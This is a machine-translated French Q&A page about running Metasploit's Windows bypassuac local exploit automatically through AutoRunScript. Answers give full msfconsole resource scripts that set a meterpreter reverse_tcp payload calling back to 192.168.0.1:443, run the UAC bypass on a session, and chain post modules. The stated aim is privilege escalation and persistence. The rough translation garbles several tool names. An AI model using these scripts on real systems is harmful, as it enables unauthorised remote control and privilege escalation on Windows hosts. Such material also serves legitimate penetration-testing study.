web-dev-qa-db-fra.com

Comment exécuter Exploice / Windows / Local / ByPassuac à l'aide de AutorunScript?

Existe-t-il un moyen d'exécuter des exploits nécessitant des paramètres tels que celui du titre, en utilisant AutorunScript?

J'ai pu utiliser Autorunscript pour exécuter parfaitement des commandes de poste, telles que keylog_recorder ou checkvm.

Mais quand j'ai ajouté mon script ceci:

use exploit/windows/local/bypassuac
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.0.1
set LPORT 443
set DisablePayloadHandler true
set SESSION 1
set TECHNIQUE EXE
set ExitOnSession false
exploit

J'ai ceci:

[*]     Running command use exploit/windows/local/bypassuac
Loading extension exploit/windows/local/bypassuac...
[-] Failed to load extension: No module of the name ext_server_exploit/windows/local/bypassuac.x86.dll found
[*]     Running command set TARGET 0
[-] Unknown command: set.
[*]     Running command set PAYLOAD windows/meterpreter/reverse_tcp
[-] Unknown command: set.

Il est clair que je manque quelque chose ici. Comment puis-je faire ceci? Mon objectif est de pouvoir contourner UAC, d'utiliser GetSystem puis de passer de pied à l'aide des options de persistance.

En tant que note latérale, je comprends que l'utilisation de "Set Session 1" ne fonctionnera que pour le premier ordinateur de l'engagement. J'aurais besoin d'une variable pour faire référence à la session qui initie actuellement.

Quelqu'un a des solutions pour cela?

5
user342872

Vous devez donner les options directement là où vous définissez la modification automatique.

msf exploit(handler) > set AutoRunScript exploit/windows/local/bypassuac LHOST=192.168.0.1 LPORT=443
2
void_in

Vous ne pouvez pas exécuter ces commandes dans un autorunscript, car elles sont des commandes au MSFConsole, tandis que l'autoscriptrun ne fonctionne que sur le contexte de Medeprètre. Donc, vous auriez besoin de quelque chose comme ça:

#msfconsole.rc
   #Configure your listener and payload
   use multi/handler
   set PAYLOAD windows/meterpreter/reverse_tcp
   set LHOST 192.168.0.1
   set LPORT 443
   set AutoRunScript auto.rc
   exploit -j
   use exploit/windows/local/bypassuac
   set TARGET 0
   set PAYLOAD windows/meterpreter/reverse_tcp
   set LHOST 192.168.0.1
   set LPORT 443
   set DisablePayloadHandler true
   set SESSION 1
   set TECHNIQUE EXE
   set ExitOnSession false
   #here you can also set another AutoRunScript for your new payload
   exploit

Et sur l'auto.rc, vous pouvez mettre des choses comme:

# auto.rc

sysinfo
checkvm

Et toute autre commande de compteur ou module post.

1
w0lf